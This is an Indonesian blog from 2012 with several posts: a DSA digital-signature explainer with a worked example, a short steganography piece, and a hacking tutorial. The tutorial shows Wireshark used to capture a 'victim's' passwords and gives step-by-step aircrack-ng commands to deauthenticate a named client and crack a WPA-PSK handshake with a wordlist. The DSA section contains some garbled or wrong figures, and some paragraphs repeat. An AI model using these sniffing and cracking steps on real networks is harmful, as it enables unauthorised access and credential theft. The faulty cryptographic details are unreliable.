Senin, 05 November 2012

DSA (digital signature algoritma)


TANDA TANGAN DIGITAL

Sejak berabad-abad lamanya tanda tangan digunakan untuk membuktikan otentik dokumen kertas (misal surat, piagam, ijazah, buku, karyaseni, dan sebagainya). Tanda-tangan mempunyai karakteristik sebagai berikut :
1.      Tanda tangan adalah bukti yang otentik
2.      Tanda tangan tidak dapat dilupakan
3.      Tanda tangan tidak dapat dipindahka untuk digunakan ulang.
4.      Dokumen yang telah di tanda tangan tidak dapat diubah
5.      Tanda tangan tidak dapat disangakal (repudiation).

Fungsi tanda tangan pada dokumen kertas juga diterapkan untuk otentikasi pada data digital seperti pesan yang dikirim melalui saluran komunikasi dan dokumen elektronis yang disimpan dalam memori komputer. Tanda tangan digital ini dinamakan tanda-tangan digital (digital signature). Yang dimaksud dengan tanda-tangan digital bukanlah tanda tangan yang di-digitalisasi dengan alat scanner, tetapi suatu nilai kriptografis yang bergantung pada pesan dan pengirim pesan (hal ini kontras dengan tanda tangan yang di dokumen kertas yang bergantung pada pengirim dan selalu sama untuk semua dokumen). Dengan tanda-tangan digital ,maka integritas data dapat dijamin, disamping itu ia juga digunakan untuk membuktikan asal pesan (keabsahan pengirim), dan nirpenyangkalan.

Menandatangani pesan dapat dilakukan dengan salah satu dari dua cara :
1.      Enkripsi pesan
Mengenkripsikan pesan dengan sendirinya juga menyediakan ukuran otentikasi. Pesan yang terenkripsi sudah menyatakan bahwa pesan tersebut telah ditandatangani.
2.      Tandatangan digital dengan fungsi hash (hash function)
Tandatangan digital dibangkitkan dari hash terhadap pesan. Nilai hash adalah kode ringkas dari pesan. Tandatangan digital berlaku seperti tanda–tangan pada dokumen kertas.Tandatangan digital ditambahkan (append) pada pesan.

Tanda Tangan Digital / Digital Signature Algorithm (DSA)

Tandatangan digital berbentuk sepasang besar angka yang ditampilkan komputer sebagai string dari digit biner. Tandatangan digital dihitung dengan menggunakan sejumlah aturan dan sejumlah parameter sehingga identitas pemilik dan integritas data dapat diverifikasi. Pembuat tanda tangan menggunakan kunci privat untuk membuat tanda tangan; sedangkan Kunci publik, yang berkorespodensi dengan kunci privat namun tidak sama, digunakan untuk Memverifikasi tanda tangan. Setiap user memiliki sepasang kunci publik dan kunci privat. Kunci publik diasumsikan diketahui public secara umum, sedangkan kunci privat tidak pernah disebar. DSA dapat dilihat sebagai variasi dari skema tanda tangan ElGamal. Keamanan DSA berdasarkan pada kemampuan logaritma diskrit dalam urutan bilangan prima Z*p. Domain parameter DSA dibangkitkan untuk setiap entitas dalam domain keamanan tertentu :

1.      Pilih bilangan prima sepanjang 160 bit dan 1024 bit dengan kondisi : q | p – 1
2.      Pilih pembangkit g yang memiliki kelompok putaran yang unik di mana q berada dalam Z*p. Pilih sebuah elemen h ฮต Z*p dan hitung g = h (p-1)/q mod p. Ulangi hingga g ≠1
3.      Parameter domain adalah p, q dan g.

Setiap entitas A dalam domain, dengan domain parameter (p,q,g) melakukan :
1. Pilih bilangan acak x dengan ketentuan 1 ≤ x ≤ q−1
2. Hitung y = gx mod p
3. Kunci publik A adalah y, sedangkan kunci privat A adalah x
Untuk menandatangani pesan m, A melakukan :
1. Pilih bilangan acak k denganketentuan 1 ≤ k ≤ q−1
2. Hitung X = gk mod p dan r = X mod q. Jika r = 0, lakukan langkah 1
3. Hitung k-1 mod q
4. Hitung e = SHA-1(m)
5. Hitung s = k-1 { e+xr } mod q. Jika s = 0, lakukan langkah 1
6. Tanda tangan A untuk pesan m adalah (r,s)
Untuk memverifikasi tanda tangan A (r,s) pada m, B mendapat salinan sah dari domain
parameter A (p,q,g) dan kunci publik y dan melakukan :
1. Verifikasi bahwa r dan s berada dalam interval [1,q-1]
2. Hitung e = SHA-1(m)
3. Hitung w = s-1 mod q
4. Hitung u1 = ew mod q dan u2 = rw mod q
5. Hitung X = gu1yu2 mod p dan v = X mod q
6. Tanda tangan benar jika dan hanya jika v = r

ALGORITMA TANDA TANGAN DIGITAL

Sepasang kunci :
            P: bilangan prima antara panjang 412 dan 1024 bit
            q: factor bilangan prima p – 1, panjang 160 bit
            g≡ h-(p-1)/q (mod p) > 1, dan h_ < p - 1
            (p, q dan g): parameter umum
            x <q :kunci rahasia, mempunyai panjang 160 bit



Proses pengiriman :
            k < q: bilangan acak   
            r≡ (gk mod p) (mod q)
            s ≡ k-1 (h + xr) (mod q), h = H(m) adalah fungsi Hash satu arah untuk pesan m.
            (r, s): tanda tangan digital
Pembuktian tanda tangan digital :
            w ≡ s-1 (mod q)
            ul ≡ h x w (mod q)
            u2 ≡ r x w (mod q)
            v ≡ (gu1yu2 (mod p)) (mod q)
            If v = r, tanda tangan digital telah dibuktikan keasliannya.


algoritmanya

Contoh :
Diasumsikan dipilih p = 23 dan q = 11, q adalah factor bilangan prima dari p -1. Dipilih h’ =16 < p -1, g ≡ 162(mod 23) ≡ 3 > 1.
Dipilih kunci rahasia x = 7 < q dan kunc iumum y gx(mod p) ≡ 37(mod 23)≡ 2
1.      Pengirim menanda-tangani pesan :
Dipilih K = 5, k < q = 11 dan untuk tanda tangannya (r,s) seperti di bawah ini:
r≡ (gk mod p) (mod q)
  ≡ (35 mod 23) (mod 11) ≡ 13 (mod 11) ≡ 2
Diasumsikan h = H(m) = 10 dan dihitung :
s ≡ k-1 (h + xr) (mod q)
  ≡ 5-1 (10 + 7 x 2) (mod 11) ≡ (9 x 24) (mod 11) ≡ 216 (mod 11) ≡ 7
Di mana perkalian inverse k-1adalah:
k .k-1 ≡ 1 (mod q)
5k-1 ≡ (mod 11) darik-1 = 9
2.   Penerima membuktikan tanda tangan digital dengan perhitungan :
      w ≡s-1 (mod q)
           ≡7-1(mod 11) ≡ 8
      u1≡ (h x w) (mod q)
           ≡ (10 x 8) (mod 11) ≡ 3
      u2 ≡ (r x w) (mod q)
           ≡ (2 x 8) (mod 11) ≡ 5
      v   ≡ ((gu1 x yu2) mod p) (mod q)
           ≡ ((33 x 25) mod 23) (mod 11)
           ≡ (864 (mod 23)) (mod 11) ≡ 13 (mod 11) ≡ 2
Karena v = r = 2, tanda tangan digital terbukti keabsahannya.

Minggu, 07 Oktober 2012

STEGANOGRAFI

Steganografi ??

Apa kah itu,, Nah itu yang nantinya akan kita bahas dalam uraian blog ini...

1. Steganografi ialah sejenis ilmu atau seni pembuatan pesan, menyembunyikan pesan antara pengirim dan penerima . agar pesan yang mereka kirim tidak ketahuan dan supaya orang lain tidak menyadari pesan yang kita kirim kan trsbt.

2. Tujuan utama Steganografi ini adalah tak lain tak bukan untuk menyembunyikan pesan data, bahkan informasi. biasanya digunakan dalam medan perang dan berbagai keperluan yang mencakup pengirimana informasi atau pesan.

3. Dari penjelasan singkat diatas kita dapat mengetahaui bahwa ilmu steganografi ini sangat diperlukan dalam kehidupan dan sangat banyak kegunaan dari ilmu ini. maka dari itu mari kita coba untuk melakukan sebuah metode untuk melakukan STEGANOGRAFI diatas,

langkah awal untuk melakukan steganografi ialah
menetukan metode yang akan kita lakaukan agar pesan tersebut terselubung.

kita akan menggunakan metode seperti dibawah ini;

gambar dibawah ini merupakan sebuah data yang sudah di kodekan


kode di atas menggunakan kode kotak atau disebut juga dengan kode box..
nah kode diatas mengandung makna yang tersirat dalam kodenya...

maka untuk mengetahui cara membacanya dengan menggunakan kode abjad box jiga

maka apakah kode yang terselubung dalam kode yang tertera digambar diatas ..???

kalau sudah demikia maka sangat lah muda bukan..!

mungkin bisa kita gunakan dalam mengirim suatu informasi yang rahasia atau untuk bahkan untuk permainan saja... 

mana tahu tertarik untuk mencoba,,,



Sabtu, 29 September 2012

Wireshark vs WPA-PSK


Apa yang anda bayangkan bisa Hacker,???-          Bobol bank?
-          Bobol password?
-          Ngacak-ngacak blog / website?
-          Atau sekedar mencuri data informasi?
terlihat menarik bukan???!!!

Ada beberapa teknik dalam proses tersebut kali ini kita akan membahas mengenaiWIRESHARK..Wireshark ini merupakan software untuk melakukan analisa lalu-lintas jaringan komputer, yang memiliki fungsi-fungsi yang amat berguna bagi profesional jaringan, administrator jaringan, peneliti, hingga pengembang piranti lunak jaringan. contoh tampilan aplikasi wiresharknya Wireshark dapat membaca data secara 







langsung dari Ethernet, Token-Ring, FDDI, serial (PPP and SLIP), 802.11 wireless LAN , dan koneksi ATM. Hebat kan softwarenya…

mengapa diperlukan menganalisis paket-paket pada jaringan ?

1. admin sebuah jaringan menggunakan untuk troubleshoting pada jaringannya
2. teknisi keamanan jaringan menggunakan untuk memeriksa keamanan jaringan nya
3. banyak yang menggunakan untuk mempelajari protokol jaringanya sendiri
4. banyak juga yang menggunakan sebagai sniffer atau pengendus di jarigan 

wireshark ini mempunyai kelebiahan dan kekurangan juga tentu nya.


Program ini juga sering digunakan oleh chatters untuk mengetahui ip victimnya maupun para chatter lainnya lewat typingan room.Cara Menggunakan WireShark:o   Punya dulu aplikasi wiresharnya baru deh  Jalankan programnyao   Klik capture lalu optiono   Pada Interfacenya pastikan yang dipilih adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan cara untuk mengetahuinya adalah pilih salah satu kemudian lihat bawahnya pada tulisan ip addres: apabila status ip addresnya unknow, maka pilih intarface lainya dan pastikan ip addres anda tampil pada interface, maka pilih itu lalu klik start. Contoh ethernet card: SiS NIC SISNIC (Microsoft's Packet Scheduler) \Device\NPF_{A82B443F-9592-4213- BDAE-00AEC174ACB6}o   Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol starto   Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swticho   Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (melihat aktivitas vitctim)o   Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan victim ke website dan sebaliknya

memang masih banyak proses didalam nya yang perlu pedalaman ilmu lagi tapi setidaknya bisa berbagi walaupun sedikit yang diahami

          

memang masih banyak proses didalam nya yang perlu pedalaman ilmu lagi tapi setidaknya bisa berbagi walaupun sedikit yang diahami
            รจ Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.


Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.


-------
Nah yang berikut ini mengenai

cara melakukan menghacking jaringan infrastruktur dengan encryp WPA - PSK pada ubuntu

Sebelumnya ini hanya perkenalan atau mencoba berbagi ilmu tapi untuk kalangan newbie sebenarnya dan beberapa tergolong pemula, semoga dalam konteks ini bisa meningkatkan ilmu kita
semoga tutorial ini dapat membantu...



·         Sebagai informasi
pertama tama sebagaimana bisaa…


1. Siapkan CD Live Backtrack n tentunya dengan partnernya n of course sebatang rokok agar lebih santai..

2. masuk ke dekstop dengan perintah ~# startx

3. buka konsole dan ketikkan perintah :~# ifconfig -a


·        


4. :~# ifconfig wlan0 up (tuk mengaktifkan interface wlan0)




5. :~# airmon-ng

:~# airmon-ng start wlan0[/color] (tuk membuat virtual interface mode monitor)




6. ~# airodump-ng mon0 (tuk memonitoring jaringan yang ada di sekitar)

mon0 adalah interface virtual hasil dari airmon-ng tadi



hasil dari airodump-ng mon0




7. :~# airodump-ng -w test --channel 11 --bssid 00904c910001 mon0

(tuk memonitoring khusus jaringan yang memiliki bssid 00:90:4C:91:00:01 pada channel 11 dan hasil dari monitoring di tulis pada file yang bernama 'test')




8. :~# aireplay-ng -0 1 -a 00904c910001 -c oo1cbfa13fe3 mon0

(aireplay-ng digunakan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking)


-0 : mode serangan deAuthentication
1 : dilakukan sebanyak 1x deAuth






9. setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah

:~# aircrack-ng test-01.cap -w /pentest/passwords/wordlists/inawpa.txt


inawpa.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/inawpa.txt





sebagai informasi, keberhasilan proses cracking tergantung ada tidaknya password yang ada di list password dengan password yang sebenarnya...jika password yang digunakan pada jaringan tersebut ada di list password maka proses cracking akan berhasil dan jika password list yang qt miliki tidak mencatat password yang digunakan pada jaringan tersebut kemungkinan keberhasilan proses cracking akan gagal.

SEMOGA DAPAT MEMBANTU BAGI PARA NEWBIE...
kalo ada kekurangan mohon dicerahkan..